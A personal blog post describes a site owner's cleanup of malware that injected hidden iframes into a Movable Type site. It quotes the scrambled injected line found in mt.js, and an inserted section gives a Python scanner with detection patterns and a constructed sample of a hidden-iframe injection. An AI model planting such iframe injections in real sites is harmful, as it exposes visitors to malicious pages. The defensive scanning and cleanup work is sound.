Nuke the Site from Orbit…

(It’s the only way to be sure.) Hello again — So the problem around here has been some kind of malware injecting tiny iframes that link to suspect sites when people visited through Google. This is a relatively common hack, but I’ve been having serious trouble figuring out the vector. (It didn’t help that my soon-to-be-ex-host is AWOL, the Movable Type forums are a dead zone, and that I’m very much of the n00b persuasion when it comes to coding and server-side issues, although I’m considerably savvier now than I was this time last week.)

Anyway, after rolling back everything and reinstalling MT (twice), a lucky scan using this White Fir tool uncovered this nasty bit of work lurking in my mt.js file:

// document.w***e(‘ =diu bsatr=#s6ygocbxtt”>=igsale rrc<"htup:./ktihha/ch,21024453.itbm"'wikth<"519" oehfhu<"409#>‘);//

(I say lucky, but I have a suspicion this code is only visible on the first scan from a given source. The reason I started suspecting mt.js is because it was considered an additional link on the first Sucuri Sitecheck scan I did…but only that first scan, not on subsequent ones.)

Anyway, even with my changing that first “write” above, this code still looks scrambled to all hell. But, whatever it does, unlike Mr. Pibb and Red Vines, it’s also clearly crazy malicious, and thus has been swiftly airlocked.

To be honest, I’m still not sure what the original vector of infection was — I’m hoping it was some sort of cross-scripting vulnerability of an earlier version of MT. But I also feel like I deleted this mt.js file and rebuilt it from scratch using an all-new MT 5.14 default template a few days ago, and the problem was still extant. (I’ve also scoured my MySQL database for tricksy scripts like “eval,” “unescape,” “basecode64” etc. Nothing there.)
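As an added example (mine, not the author's and not part of Movable Type), here is a small Python scanner that does on disk what the post describes doing by hand: it walks template, JS, PHP and SQL-dump files looking for document.write() calls that emit iframes, eval() over unescape/base64-decoded data, long escape runs, and iframes sized or styled to be invisible. Because it reads files rather than fetching pages, the first-scan-only cloaking suspected above cannot hide the payload from it; the sample inputs are constructed and the URL is a placeholder.

```python
import os
import re

# Indicators for the injection described above: document.write() emitting an
# iframe, eval() over decoded data, base64_decode(), long %xx/\xNN escape
# runs, and iframes sized or styled to be invisible. Constructed; tune per site.
PATTERNS = [
    ("document.write emitting iframe",
     re.compile(r"document\.write\s*\(.*?<\s*iframe", re.I | re.S)),
    ("eval over decoded data",
     re.compile(r"eval\s*\(\s*(?:unescape|atob|String\.fromCharCode|base64_decode)\s*\(", re.I)),
    ("base64_decode call", re.compile(r"base64_decode\s*\(", re.I)),
    ("long escaped-character run",
     re.compile(r"(?:%[0-9a-f]{2}){12,}|(?:\\x[0-9a-f]{2}){12,}", re.I)),
    ("iframe sized or styled to be invisible",
     re.compile(r"<\s*iframe[^>]*?(?:\b(?:width|height)\s*=\s*['\"]?[01]\b"
                r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)),
]
SCAN_EXTENSIONS = (".js", ".php", ".tmpl", ".html", ".sql")

def scan_text(text):
    """Return (label, line_number) for every pattern hit in text."""
    hits = []
    for label, pattern in PATTERNS:
        for match in pattern.finditer(text):
            hits.append((label, text.count("\n", 0, match.start()) + 1))
    return hits

def scan_tree(root):
    """Scan files on disk; a cloaked payload cannot hide from a filesystem read."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    findings[path] = hits
    return findings

# Constructed sample resembling an injected mt.js; the URL is a placeholder.
INJECTED_SAMPLE = (
    "function mtAttachEvent(e) {}\n"
    "// document.write('<iframe src=\"http://example.invalid/x.php\" "
    "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');//\n"
)
CLEAN_SAMPLE = "function mtAttachEvent(e) { return e; }\n"
```

Point scan_tree() at the site root (templates, mt-static, and a fresh mysqldump) and review every hit by hand; the patterns are deliberately broad, so expect a few benign matches in legitimate minified scripts.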

So, at the moment, Google’s given GitM a clean bill of health again. Let’s hope it holds. In the meantime, everything I said in the last post stands — I’ll need to find a new host for GitM at some point. But, for now, I’m trying to knock out these last few chapters, so I’d best get back to it. Hope everyone out there is well.

P.S. I’m aware comments have been acting funky as well and that the comment box comes and goes. Apologies if you are a real human being who has tried to leave one in recent days. I think it’s fixed now — the comment spam seems to be getting through, in any event.

2 thoughts on “Nuke the Site from Orbit…”

  1. Hey Kev, glad to hear you are balls to the wall on the dissertation and defense. Get er done!

    BTW saw a nice article in the Times a few days back about Gillian and Ethan with their photo, meant to send it along to you, but assume you knew about it.

    We are up in Moosehead Lake, Maine for a few days, then wending our way back down to NYC metro and then DC- hope to give you a shout when we are close.

    Take good care, glad to hear Berk is spiffy.
    Jim Bob in St Augustine..
